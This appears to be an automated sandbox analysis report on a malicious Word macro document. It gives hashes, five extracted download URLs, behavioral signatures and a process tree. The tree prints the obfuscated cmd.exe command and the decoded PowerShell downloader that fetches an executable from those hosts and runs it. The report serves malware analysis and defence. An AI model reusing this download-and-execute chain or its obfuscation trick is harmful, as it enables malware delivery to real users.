Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
17-06-2024 20:33
Behavioral task
behavioral1
Sample
b9ea54d7115c94d28eb87047cda990e1_JaffaCakes118.doc
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
b9ea54d7115c94d28eb87047cda990e1_JaffaCakes118.doc
Resource
win10v2004-20240611-en
General
-
Target
b9ea54d7115c94d28eb87047cda990e1_JaffaCakes118.doc
-
Size
147KB
-
MD5
b9ea54d7115c94d28eb87047cda990e1
-
SHA1
5bc51c3fd4ce45cf1e185c3fac0daffdbdf338c5
-
SHA256
962ff19f56b94669106e2eb69ef717e0a590591608370c41b239a0649d19cfb2
-
SHA512
aa6eaf72f92b00475c6dd6bc6a6f00ac6576b9258b69d32e013052f5f21157c698eeec1d8d7173d12cb9ab392b8ba545bebcae9d60df413edadef9334c913b2a
-
SSDEEP
1536:F81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9OUVk0mksZHT:F8GhDS0o9zTGOZD6EbzCda0mkmHT
Malware Config
Extracted
http://alistairmccoy.co.uk/0R
http://erinkveld.eu/tKlZyU
http://dentaware.com/PbF
http://havmore.in/UXxra
http://aphn.org/zTADPIb
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 5104 4060 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 20 1888 powershell.exe 22 1888 powershell.exe 23 1888 powershell.exe 25 1888 powershell.exe -
Executes dropped EXE 4 IoCs
Processes:
38.exe38.exereadmerule.exereadmerule.exepid process 468 38.exe 3544 38.exe 2164 readmerule.exe 4556 readmerule.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 4060 WINWORD.EXE 4060 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exe38.exe38.exereadmerule.exereadmerule.exepid process 1888 powershell.exe 1888 powershell.exe 468 38.exe 468 38.exe 3544 38.exe 3544 38.exe 2164 readmerule.exe 2164 readmerule.exe 4556 readmerule.exe 4556 readmerule.exe 4556 readmerule.exe 4556 readmerule.exe 4556 readmerule.exe 4556 readmerule.exe 4556 readmerule.exe 4556 readmerule.exe 4556 readmerule.exe 4556 readmerule.exe 4556 readmerule.exe 4556 readmerule.exe 4556 readmerule.exe 4556 readmerule.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1888 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 4060 WINWORD.EXE 4060 WINWORD.EXE 4060 WINWORD.EXE 4060 WINWORD.EXE 4060 WINWORD.EXE 4060 WINWORD.EXE 4060 WINWORD.EXE -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
WINWORD.EXEcmd.execmd.exepowershell.exe38.exereadmerule.exedescription pid process target process PID 4060 wrote to memory of 5104 4060 WINWORD.EXE cmd.exe PID 4060 wrote to memory of 5104 4060 WINWORD.EXE cmd.exe PID 5104 wrote to memory of 4944 5104 cmd.exe cmd.exe PID 5104 wrote to memory of 4944 5104 cmd.exe cmd.exe PID 4944 wrote to memory of 1888 4944 cmd.exe powershell.exe PID 4944 wrote to memory of 1888 4944 cmd.exe powershell.exe PID 1888 wrote to memory of 468 1888 powershell.exe 38.exe PID 1888 wrote to memory of 468 1888 powershell.exe 38.exe PID 1888 wrote to memory of 468 1888 powershell.exe 38.exe PID 468 wrote to memory of 3544 468 38.exe 38.exe PID 468 wrote to memory of 3544 468 38.exe 38.exe PID 468 wrote to memory of 3544 468 38.exe 38.exe PID 2164 wrote to memory of 4556 2164 readmerule.exe readmerule.exe PID 2164 wrote to memory of 4556 2164 readmerule.exe readmerule.exe PID 2164 wrote to memory of 4556 2164 readmerule.exe readmerule.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b9ea54d7115c94d28eb87047cda990e1_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set LEA=uUTnlInWPSJGzFDwviio(Cxc)e8dp$mj0yVfOX;@Bb,+Eg:NHZhR}r{/\A3skL=.'ta- K&&for %W in (29;53;47;51;62;64;15;40;65;64;38;29;4;31;65;62;6;25;15;67;19;41;31;25;23;65;68;47;25;65;63;7;25;41;21;4;18;25;6;65;38;29;61;12;31;62;64;50;65;65;28;46;55;55;66;4;18;59;65;66;18;53;30;23;23;19;33;63;23;19;63;0;60;55;32;51;39;50;65;65;28;46;55;55;25;53;18;6;60;16;25;4;27;63;25;0;55;65;69;4;49;33;1;39;50;65;65;28;46;55;55;27;25;6;65;66;15;66;53;25;63;23;19;30;55;8;41;13;39;50;65;65;28;46;55;55;50;66;16;30;19;53;25;63;18;6;55;1;37;22;53;66;39;50;65;65;28;46;55;55;66;28;50;6;63;19;53;45;55;12;2;57;14;8;5;41;64;63;9;28;4;18;65;20;64;39;64;24;38;29;59;66;69;62;64;51;6;69;64;38;29;14;66;15;68;62;68;64;58;26;64;38;29;44;27;37;62;64;44;2;61;64;38;29;47;8;0;62;29;25;6;16;46;65;25;30;28;43;64;56;64;43;29;14;66;15;43;64;63;25;22;25;64;38;35;19;53;25;66;23;50;20;29;4;31;8;68;18;6;68;29;61;12;31;24;54;65;53;33;54;29;4;31;65;63;14;19;15;6;4;19;66;27;13;18;4;25;20;29;4;31;8;42;68;29;47;8;0;24;38;29;12;59;36;62;64;48;13;57;64;38;5;35;68;20;20;11;25;65;67;5;65;25;30;68;29;47;8;0;24;63;4;25;6;45;65;50;68;67;45;25;68;26;32;32;32;32;24;68;54;5;6;16;19;60;25;67;5;65;25;30;68;29;47;8;0;38;29;2;34;37;62;64;31;10;10;64;38;41;53;25;66;60;38;52;52;23;66;65;23;50;54;52;52;29;11;9;61;62;64;12;31;66;64;38;72)do set Zb9=!Zb9!!LEA:~%W,1!&&if %W geq 72 powershell.exe "!Zb9:*Zb9!=!""2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Windows\system32\cmd.exeCmD /V:O/C"set LEA=uUTnlInWPSJGzFDwviio(Cxc)e8dp$mj0yVfOX;@Bb,+Eg:NHZhR}r{/\A3skL=.'ta- K&&for %W in (29;53;47;51;62;64;15;40;65;64;38;29;4;31;65;62;6;25;15;67;19;41;31;25;23;65;68;47;25;65;63;7;25;41;21;4;18;25;6;65;38;29;61;12;31;62;64;50;65;65;28;46;55;55;66;4;18;59;65;66;18;53;30;23;23;19;33;63;23;19;63;0;60;55;32;51;39;50;65;65;28;46;55;55;25;53;18;6;60;16;25;4;27;63;25;0;55;65;69;4;49;33;1;39;50;65;65;28;46;55;55;27;25;6;65;66;15;66;53;25;63;23;19;30;55;8;41;13;39;50;65;65;28;46;55;55;50;66;16;30;19;53;25;63;18;6;55;1;37;22;53;66;39;50;65;65;28;46;55;55;66;28;50;6;63;19;53;45;55;12;2;57;14;8;5;41;64;63;9;28;4;18;65;20;64;39;64;24;38;29;59;66;69;62;64;51;6;69;64;38;29;14;66;15;68;62;68;64;58;26;64;38;29;44;27;37;62;64;44;2;61;64;38;29;47;8;0;62;29;25;6;16;46;65;25;30;28;43;64;56;64;43;29;14;66;15;43;64;63;25;22;25;64;38;35;19;53;25;66;23;50;20;29;4;31;8;68;18;6;68;29;61;12;31;24;54;65;53;33;54;29;4;31;65;63;14;19;15;6;4;19;66;27;13;18;4;25;20;29;4;31;8;42;68;29;47;8;0;24;38;29;12;59;36;62;64;48;13;57;64;38;5;35;68;20;20;11;25;65;67;5;65;25;30;68;29;47;8;0;24;63;4;25;6;45;65;50;68;67;45;25;68;26;32;32;32;32;24;68;54;5;6;16;19;60;25;67;5;65;25;30;68;29;47;8;0;38;29;2;34;37;62;64;31;10;10;64;38;41;53;25;66;60;38;52;52;23;66;65;23;50;54;52;52;29;11;9;61;62;64;12;31;66;64;38;72)do set Zb9=!Zb9!!LEA:~%W,1!&&if %W geq 72 powershell.exe "!Zb9:*Zb9!=!""3⤵
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe "$rNR='wBt';$ljt=new-object Net.WebClient;$Lzj='http://alistairmccoy.co.uk/0R@http://erinkveld.eu/tKlZyU@http://dentaware.com/PbF@http://havmore.in/UXxra@http://aphn.org/zTADPIb'.Split('@');$saK='RnK';$Daw = '38';$EdX='ETL';$NPu=$env:temp+'\'+$Daw+'.exe';foreach($ljP in $Lzj){try{$ljt.DownloadFile($ljP, $NPu);$zsO='HFA';If ((Get-Item $NPu).length -ge 80000) {Invoke-Item $NPu;$TVX='jJJ';break;}}catch{}}$GSL='zja';"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Users\Admin\AppData\Local\Temp\38.exe"C:\Users\Admin\AppData\Local\Temp\38.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Users\Admin\AppData\Local\Temp\38.exe"C:\Users\Admin\AppData\Local\Temp\38.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3544
-
C:\Windows\SysWOW64\readmerule.exe"C:\Windows\SysWOW64\readmerule.exe"1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\SysWOW64\readmerule.exe"C:\Windows\SysWOW64\readmerule.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4556
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
376KB
MD5ac4ad219921aa13ac020f5dc460ad503
SHA1df3cadeb2736d3df7a31c6c9d3dad122d9570e16
SHA2564a417963968601bbe8f9311d779d1a022a380829bed4b7af4daf934eeba5c70f
SHA5122df686213ea67e030440deb61fed6559f721b0b6bf973915c7509b1cc15896669ffab5061cfc1674d358c819e69756276a0e8180e65ee47855d4b5ab882676fb
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82